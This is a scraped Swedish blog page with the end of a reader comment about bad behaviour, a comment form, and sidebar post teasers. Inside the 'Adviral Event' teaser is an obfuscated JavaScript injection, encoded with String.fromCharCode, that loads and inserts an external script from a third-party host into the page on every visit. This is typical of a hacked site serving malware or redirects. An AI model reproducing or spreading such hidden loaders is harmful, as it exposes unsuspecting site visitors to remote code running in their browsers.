  Antagligen en dålig kombo utav alla dessa funderingar😳Så tragiskt & trist. Visst ska man lära sig att ”låta det rinna av en” men man kan inte tåla vad för skit som helst.

  Det är ju inte konstigt att våra barn & ungdomar tar efter ett dåligt beteende.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/